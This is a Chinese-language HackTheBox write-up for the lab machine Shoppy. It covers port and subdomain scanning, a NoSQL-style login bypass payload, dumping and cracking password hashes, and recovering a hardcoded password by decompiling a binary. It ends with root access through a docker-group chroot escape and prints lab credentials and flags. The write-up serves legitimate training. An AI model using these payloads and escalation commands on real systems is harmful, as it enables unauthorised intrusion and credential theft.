Shoppy-htb-writeup

0x00 靶场技能介绍

章节技能：目录扫描、子域名扫描、SQL注入、万能密码、sudo、二进制反编译、硬编码、docker特权组

参考链接：https://blog.heapbytes.tech/rooms/hackthebox/easy/shoppy

参考链接：https://0xdf.gitlab.io/2023/01/14/htb-shoppy.html

0x01 用户权限获取

1、靶机介绍

关于Shoppy
Shoppy 是一款简单的 Linux 机器，其特点是带有登录面板和用户搜索功能的网站，但容易受到 NoSQL 注入攻击。攻击者可以利用该漏洞获取所有用户的密码哈希值。破解其中一位用户的密码哈希值后，我们可以验证服务器上运行的 Mattermost 聊天，从而获取用户“jaeger”的 SSH 凭据。通过逆向工程密码管理器二进制文件，可以横向移动到用户“deploy”，从而获取用户的密码。我们发现用户“deploy”是组“docker”的成员。可以利用其权限读取根标志。

2、首先测试下靶机连通率

┌──(kali㉿offsec)-[~/Desktop]
└─$ ping 10.10.11.180 -c 4                                   
PING 10.10.11.180 (10.10.11.180) 56(84) bytes of data.
64 bytes from 10.10.11.180: icmp_seq=1 ttl=63 time=141 ms
64 bytes from 10.10.11.180: icmp_seq=2 ttl=63 time=138 ms
64 bytes from 10.10.11.180: icmp_seq=3 ttl=63 time=130 ms
64 bytes from 10.10.11.180: icmp_seq=4 ttl=63 time=131 ms

--- 10.10.11.180 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3012ms
rtt min/avg/max/mdev = 129.998/135.048/140.680/4.476 ms

3、扫描下开放端口情况

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- -Pn 10.10.11.180 --min-rate=10000   
[sudo] kali 的密码：
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-24 15:12 CST
Nmap scan report for 10.10.11.180
Host is up (0.13s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
9093/tcp open  copycat

Nmap done: 1 IP address (1 host up) scanned in 16.05 seconds
                                                                                                                                                           
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p22,80,9093 -sC -sV -Pn 10.10.11.180 --min-rate=10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-24 15:13 CST
Nmap scan report for 10.10.11.180
Host is up (0.13s latency).

PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 9e:5e:83:51:d9:9f:89:ea:47:1a:12:eb:81:f9:22:c0 (RSA)
|   256 58:57:ee:eb:06:50:03:7c:84:63:d7:a3:41:5b:1a:d5 (ECDSA)
|_  256 3e:9d:0a:42:90:44:38:60:b3:b6:2c:e9:bd:9a:67:54 (ED25519)
80/tcp   open  http     nginx 1.23.1
|_http-title: Did not follow redirect to http://shoppy.htb
|_http-server-header: nginx/1.23.1
9093/tcp open  copycat?
| fingerprint-strings: 
|   GenericLines: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest, HTTPOptions: 
|     HTTP/1.0 200 OK
|     Content-Type: text/plain; version=0.0.4; charset=utf-8
|     Date: Tue, 24 Sep 2024 07:03:02 GMT
|     HELP go_gc_cycles_automatic_gc_cycles_total Count of completed GC cycles generated by the Go runtime.
|     TYPE go_gc_cycles_automatic_gc_cycles_total counter
|     go_gc_cycles_automatic_gc_cycles_total 3
|     HELP go_gc_cycles_forced_gc_cycles_total Count of completed GC cycles forced by the application.
|     TYPE go_gc_cycles_forced_gc_cycles_total counter
|     go_gc_cycles_forced_gc_cycles_total 0
|     HELP go_gc_cycles_total_gc_cycles_total Count of all completed GC cycles.
|     TYPE go_gc_cycles_total_gc_cycles_total counter
|     go_gc_cycles_total_gc_cycles_total 3
|     HELP go_gc_duration_seconds A summary of the pause duration of garbage collection cycles.
|     TYPE go_gc_duration_seconds summary
|     go_gc_duration_seconds{quantile="0"} 1.7823e-05
|     go_gc_duration_seconds{quantile="0.25"} 1.7823e-05
|_    go_gc_dur
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :

4、这里绑定下端口扫描发现的域名信息

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.11.180 shoppy.htb" | sudo tee -a /etc/hosts
10.10.11.180 shoppy.htb

5、然后查看下该域名下的网站内容信息

http://shoppy.htb/

6、这里我们使用ffuf扫描下网站目录情况

┌──(kali㉿offsec)-[~/Desktop]
└─$ ffuf -u http://shoppy.htb/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://shoppy.htb/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

images                  [Status: 301, Size: 179, Words: 7, Lines: 11, Duration: 144ms]
#                       [Status: 200, Size: 2178, Words: 853, Lines: 57, Duration: 144ms]
# directory-list-2.3-medium.txt [Status: 200, Size: 2178, Words: 853, Lines: 57, Duration: 145ms]
# This work is licensed under the Creative Commons [Status: 200, Size: 2178, Words: 853, Lines: 57, Duration: 200ms]
#                       [Status: 200, Size: 2178, Words: 853, Lines: 57, Duration: 213ms]
#                       [Status: 200, Size: 2178, Words: 853, Lines: 57, Duration: 213ms]
# Priority ordered case-sensitive list, where entries were found [Status: 200, Size: 2178, Words: 853, Lines: 57, Duration: 219ms]
# on at least 2 different hosts [Status: 200, Size: 2178, Words: 853, Lines: 57, Duration: 219ms]
# license, visit http://creativecommons.org/licenses/by-sa/3.0/ [Status: 200, Size: 2178, Words: 853, Lines: 57, Duration: 304ms]
                        [Status: 200, Size: 2178, Words: 853, Lines: 57, Duration: 301ms]
# Suite 300, San Francisco, California, 94105, USA. [Status: 200, Size: 2178, Words: 853, Lines: 57, Duration: 305ms]
# or send a letter to Creative Commons, 171 Second Street, [Status: 200, Size: 2178, Words: 853, Lines: 57, Duration: 305ms]
# Attribution-Share Alike 3.0 License. To view a copy of this [Status: 200, Size: 2178, Words: 853, Lines: 57, Duration: 305ms]
# Copyright 2007 James Fisher [Status: 200, Size: 2178, Words: 853, Lines: 57, Duration: 308ms]
#                       [Status: 200, Size: 2178, Words: 853, Lines: 57, Duration: 309ms]
login                   [Status: 200, Size: 1074, Words: 152, Lines: 26, Duration: 125ms]
admin                   [Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 121ms]
assets                  [Status: 301, Size: 179, Words: 7, Lines: 11, Duration: 127ms]
css                     [Status: 301, Size: 173, Words: 7, Lines: 11, Duration: 130ms]
Login                   [Status: 200, Size: 1074, Words: 152, Lines: 26, Duration: 166ms]
js                      [Status: 301, Size: 171, Words: 7, Lines: 11, Duration: 197ms]
fonts                   [Status: 301, Size: 177, Words: 7, Lines: 11, Duration: 123ms]
Admin                   [Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 127ms]

7、这里发现了登录地址

http://shoppy.htb/login

8、这里其实存在 nosql 注入的地方的，但是我太菜了，用sqlmap也没跑出来

POST /login?error=WrongCredentials HTTP/1.1
Host: shoppy.htb
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Content-Length: 70
Origin: http://shoppy.htb
Connection: close
Cookie: rl_user_id=RudderEncrypt%3AU2FsdGVkX19GV6NK0DxKjkw9TOqmyNCFZmtg6KKCdZ5PoCh34YJOGx%2FVvfk4Tyvx; rl_anonymous_id=RudderEncrypt%3AU2FsdGVkX19vUyluZooqYBAoFRbSX0U9FcIWMKmUNuMmm0phmDD5HHeS3EsezVG4j3SmktVo0o9SKB1lNCe0bQ%3D%3D; rl_group_id=RudderEncrypt%3AU2FsdGVkX19Od9IT1QBGmBOxy16K0LIvkmWd6bLg0Yw%3D; rl_trait=RudderEncrypt%3AU2FsdGVkX19N%2F9zK1I3qgOhRbSjBUI%2BmT1LXhV5YpN0%3D; rl_group_trait=RudderEncrypt%3AU2FsdGVkX1%2Btr%2FQPXf%2FEhg6ysL4ReI5quEwFjtvvdwQ%3D
Upgrade-Insecure-Requests: 1

{
    "username": "admin' || 'a'=='a",
    "password": "password"
}


HTTP/1.1 302 Found
Server: nginx/1.23.1
Date: Tue, 24 Sep 2024 07:55:41 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 56
Connection: close
Location: /admin
Vary: Accept
Set-Cookie: connect.sid=s%3AKXaUxPPJpq4HpOPBRRbFctuxROj7xNBf.L9TZ3qOvAVSKH5kSzcMmNdksGSjis8WZU1kwNlJrCp8; Path=/; HttpOnly

<p>Found. Redirecting to <a href="/admin">/admin</a></p>

9、然后就绕过登录了，来到了后台界面了

http://shoppy.htb/admin

10、在搜索界面上随意输入绕过代码，发现可以下载文件

http://shoppy.htb/admin/search-users?username=admin%27+%7C%7C+%27a%27%3D%3D%27a

11、下面是下载的文件内容

http://shoppy.htb/exports/export-search.json

[{"_id":"62db0e93d6d6a999a66ee67a","username":"admin","password":"23c6877d9e2b564ef8b32c3a23de27b2"},{"_id":"62db0e93d6d6a999a66ee67b","username":"josh","password":"6ebcea65320589ca4f2f1ce039975995"}]

[{"_id":"62db0e93d6d6a999a66ee67a","username":"admin","password":"23c6877d9e2b564ef8b32c3a23de27b2"},{"_id":"62db0e93d6d6a999a66ee67b","username":"josh","password":"6ebcea65320589ca4f2f1ce039975995"}]

josh
6ebcea65320589ca4f2f1ce039975995
remembermethisway

12、在这里我们获取了一些账号密码信息，然后就没进度了，其实到这里就是使劲的扫描子域名了

┌──(kali㉿offsec)-[~/Desktop]
└─$ ffuf -u http://shoppy.htb -H 'Host: FUZZ.shoppy.htb' -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt  -fs 169 

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://shoppy.htb
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
 :: Header           : Host: FUZZ.shoppy.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 169
________________________________________________

mattermost              [Status: 200, Size: 3122, Words: 141, Lines: 1, Duration: 142ms]

13、这一个步骤的子域名枚举，太坑了，我用了好几个字典都没有枚举出来想要的子域名，深度差评。

14、本地绑定下hosts信息

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.11.180 mattermost.shoppy.htb" | sudo tee -a /etc/hosts
[sudo] kali 的密码：
10.10.11.180 mattermost.shoppy.htb

15、查看该子域名下的信息

http://mattermost.shoppy.htb/login

http://mattermost.shoppy.htb/reset_password

16、这里使用上面破解出来的账号密码，登录了这个系统

http://mattermost.shoppy.htb/shoppy/channels/town-square

17、发现老板的账号

@jaeger  System Admin 系统管理员
@jess

18、发现账号密码信息

http://mattermost.shoppy.htb/shoppy/channels/deploy-machine

对于部署计算机，您可以使用以下 creds 创建一个帐户：
用户名：Jaeger
密码：Sh0ppyBest@pp!
并在其上部署。

19、然后我们就开始使用发现的账号进行登录了。这里需要注意的是用户名的大小写，在linux机器中，对大小写很明显，所以这里一般都是需要小写的用户名的。

┌──(kali㉿offsec)-[~/Desktop]
└─$ ssh jaeger@10.10.11.180
jaeger@10.10.11.180's password: 
Linux shoppy 5.10.0-18-amd64 #1 SMP Debian 5.10.140-1 (2022-09-02) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
jaeger@shoppy:~$ id
uid=1000(jaeger) gid=1000(jaeger) groups=1000(jaeger)
jaeger@shoppy:~$

20、然后获取到第一个用户的flag信息

jaeger@shoppy:~$ ls -la
total 96
drwxr-xr-x 19 jaeger jaeger 4096 Jul 22  2022 .
drwxr-xr-x  4 root   root   4096 Jul 22  2022 ..
lrwxrwxrwx  1 jaeger jaeger    9 Jul 22  2022 .bash_history -> /dev/null
-rw-r--r--  1 jaeger jaeger  220 Jul 22  2022 .bash_logout
-rw-r--r--  1 jaeger jaeger 3723 Jul 22  2022 .bashrc
drwx------ 14 jaeger jaeger 4096 Jul 22  2022 .cache
drwx------ 12 jaeger jaeger 4096 Jul 22  2022 .config
lrwxrwxrwx  1 jaeger jaeger    9 Jul 22  2022 .dbshell -> /dev/null
drwxr-xr-x  2 jaeger jaeger 4096 Jul 22  2022 Desktop
drwxr-xr-x  2 jaeger jaeger 4096 Jul 22  2022 Documents
drwxr-xr-x  2 jaeger jaeger 4096 Jul 22  2022 Downloads
drwx------  3 jaeger jaeger 4096 Jul 23  2022 .gnupg
drwxr-xr-x  3 jaeger jaeger 4096 Jul 22  2022 .local
-rw-------  1 jaeger jaeger    0 Jul 22  2022 .mongorc.js
drwxr-xr-x  2 jaeger jaeger 4096 Jul 22  2022 Music
drwxr-xr-x  4 jaeger jaeger 4096 Jul 22  2022 .npm
drwxr-xr-x  5 jaeger jaeger 4096 Jul 22  2022 .nvm
drwxr-xr-x  2 jaeger jaeger 4096 Jul 22  2022 Pictures
drwxr-xr-x  5 jaeger jaeger 4096 Sep 24 01:59 .pm2
-rw-r--r--  1 jaeger jaeger  807 Jul 22  2022 .profile
drwxr-xr-x  2 jaeger jaeger 4096 Jul 22  2022 Public
drwxr-xr-x  7 jaeger jaeger 4096 Jul 23  2022 ShoppyApp
-rwxr--r--  1 jaeger jaeger  130 Jul 22  2022 shoppy_start.sh
drwx------  2 jaeger jaeger 4096 Jul 22  2022 .ssh
drwxr-xr-x  2 jaeger jaeger 4096 Jul 22  2022 Templates
-rw-r-----  1 root   jaeger   33 Sep 24 01:59 user.txt
drwxr-xr-x  2 jaeger jaeger 4096 Jul 22  2022 Videos
jaeger@shoppy:~$ ls -la ../
total 16
drwxr-xr-x  4 root   root   4096 Jul 22  2022 .
drwxr-xr-x 19 root   root   4096 Sep 12  2022 ..
drwxr-xr-x  3 deploy deploy 4096 Jul 23  2022 deploy
drwxr-xr-x 19 jaeger jaeger 4096 Jul 22  2022 jaeger
jaeger@shoppy:~$ ls -la ../deploy
total 52
drwxr-xr-x 3 deploy deploy  4096 Jul 23  2022 .
drwxr-xr-x 4 root   root    4096 Jul 22  2022 ..
lrwxrwxrwx 1 deploy deploy     9 Jul 22  2022 .bash_history -> /dev/null
-rw-r--r-- 1 deploy deploy   220 Mar 27  2022 .bash_logout
-rw-r--r-- 1 deploy deploy  3526 Mar 27  2022 .bashrc
-rw------- 1 deploy deploy    56 Jul 22  2022 creds.txt
lrwxrwxrwx 1 deploy deploy     9 Jul 23  2022 .dbshell -> /dev/null
drwx------ 3 deploy deploy  4096 Jul 23  2022 .gnupg
-rwxr--r-- 1 deploy deploy 18440 Jul 22  2022 password-manager
-rw------- 1 deploy deploy   739 Feb  1  2022 password-manager.cpp
-rw-r--r-- 1 deploy deploy   807 Mar 27  2022 .profile
jaeger@shoppy:~$ 
jaeger@shoppy:~$ cat user.txt 
696b82cc1ca34fefee86a9fcc8341630
jaeger@shoppy:~$ 

0x02 系统权限获取

21、通过枚举，发现当前用户拥有其他用户的sudo权限

jaeger@shoppy:~$ sudo -l
[sudo] password for jaeger: 
Matching Defaults entries for jaeger on shoppy:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jaeger may run the following commands on shoppy:
    (deploy) /home/deploy/password-manager


jaeger@shoppy:~$

22、尝试利用，发现并没有权限

jaeger@shoppy:~$ sudo -u deploy /home/deploy/password-manager
Welcome to Josh password manager!
Please enter your master password: Sh0ppyBest@pp!
Access denied! This incident will be reported !
jaeger@shoppy:~$ 

23、这里，我们把这个文件复制到本地机器上

┌──(kali㉿offsec)-[~/Desktop]
└─$ scp jaeger@shoppy.htb:/home/deploy/password-manager .   
The authenticity of host 'shoppy.htb (10.10.11.180)' can't be established.
ED25519 key fingerprint is SHA256:RISsnnLs1eloK7XlOTr2TwStHh2R8hui07wd1iFyB+8.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:21: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'shoppy.htb' (ED25519) to the list of known hosts.
jaeger@shoppy.htb's password: 
password-manager                                                                                                         100%   18KB  20.7KB/s   00:00   

24、简单查看下类型

┌──(kali㉿offsec)-[~/Desktop]
└─$ file password-manager                                                                                                               
password-manager: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=400b2ed9d2b4121f9991060f343348080d2905d1, for GNU/Linux 3.2.0, not stripped

25、这里有点技能超纲了，经过仔细判断分析，还是能看出来点门道的

26、下载反编译工具

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo apt install ghidra

27、对该文件进行反编译的查看

bool main(void)

{
  int iVar1;
  basic_ostream *pbVar2;
  basic_string<> local_68 [32];
  basic_string local_48 [47];
  allocator<char> local_19 [9];
  
  pbVar2 = std::operator<<((basic_ostream *)std::cout,"Welcome to Josh password manager!");
  std::basic_ostream<>::operator<<((basic_ostream<> *)pbVar2,std::endl<>);
  std::operator<<((basic_ostream *)std::cout,"Please enter your master password: ");
  std::__cxx11::basic_string<>::basic_string();
                    /* try { // try from 00101263 to 00101267 has its CatchHandler @ 001013cb */
  std::operator>>((basic_istream *)std::cin,local_48);
  std::allocator<char>::allocator();
                    /* try { // try from 00101286 to 0010128a has its CatchHandler @ 001013a9 */
  std::__cxx11::basic_string<>::basic_string((char *)local_68,(allocator *)&DAT_0010205c);
  std::allocator<char>::~allocator(local_19);
                    /* try { // try from 001012a5 to 00101387 has its CatchHandler @ 001013ba */
  std::__cxx11::basic_string<>::operator+=(local_68,"S");
  std::__cxx11::basic_string<>::operator+=(local_68,"a");
  std::__cxx11::basic_string<>::operator+=(local_68,"m");
  std::__cxx11::basic_string<>::operator+=(local_68,"p");
  std::__cxx11::basic_string<>::operator+=(local_68,"l");
  std::__cxx11::basic_string<>::operator+=(local_68,"e");
  iVar1 = std::__cxx11::basic_string<>::compare(local_48);
  if (iVar1 != 0) {
    pbVar2 = std::operator<<((basic_ostream *)std::cout,
                             "Access denied! This incident will be reported !");
    std::basic_ostream<>::operator<<((basic_ostream<> *)pbVar2,std::endl<>);
  }
  else {
    pbVar2 = std::operator<<((basic_ostream *)std::cout,"Access granted! Here is creds !");
    std::basic_ostream<>::operator<<((basic_ostream<> *)pbVar2,std::endl<>);
    system("cat /home/deploy/creds.txt");
  }
  std::__cxx11::basic_string<>::~basic_string(local_68);
  std::__cxx11::basic_string<>::~basic_string((basic_string<> *)local_48);
  return iVar1 != 0;
}

28、这里的门道就是发现了 Sample 这个硬编码的内容，开始利用

jaeger@shoppy:~$ sudo -u deploy /home/deploy/password-manager
[sudo] password for jaeger: 
Welcome to Josh password manager!
Please enter your master password: Sample
Access granted! Here is creds !
Deploy Creds :
username: deploy
password: Deploying@pp!
jaeger@shoppy:~$ 

29、获取到deploy用户的密码凭证信息

30、开始切换用户，并枚举

jaeger@shoppy:~$ su deploy
Password: 
$ 
$ id
uid=1001(deploy) gid=1001(deploy) groups=1001(deploy),998(docker)
$ pwd
/home/jaeger
$ cd ~
$ pwd
/home/deploy
$ ls -la
total 52
drwxr-xr-x 3 deploy deploy  4096 Jul 23  2022 .
drwxr-xr-x 4 root   root    4096 Jul 22  2022 ..
lrwxrwxrwx 1 deploy deploy     9 Jul 22  2022 .bash_history -> /dev/null
-rw-r--r-- 1 deploy deploy   220 Mar 27  2022 .bash_logout
-rw-r--r-- 1 deploy deploy  3526 Mar 27  2022 .bashrc
-rw------- 1 deploy deploy    56 Jul 22  2022 creds.txt
lrwxrwxrwx 1 deploy deploy     9 Jul 23  2022 .dbshell -> /dev/null
drwx------ 3 deploy deploy  4096 Jul 23  2022 .gnupg
-rwxr--r-- 1 deploy deploy 18440 Jul 22  2022 password-manager
-rw------- 1 deploy deploy   739 Feb  1  2022 password-manager.cpp
-rw-r--r-- 1 deploy deploy   807 Mar 27  2022 .profile
$ cat /etc/passwd | grep "deploy"
deploy:x:1001:1001::/home/deploy:/bin/sh
$ 
$ docker images
REPOSITORY   TAG       IMAGE ID       CREATED       SIZE
alpine       latest    d7d3d98c851f   2 years ago   5.53MB
$ 

31、这里用户拥有 docker 组的权限，直接利用HTB学院里的特权组利用章节，一套带走

$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# id
uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo)
# cd /root
# lss
sh: 3: lss: not found
# ls
root.txt
# cat root      ^H^H^H^H^H
cat: root: No such file or directory
cat: ''$'\b\b\b\b\b': No such file or directory
# cat root.txt
ba39063a210d2db8385c84186d6e8a8c
# 

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/496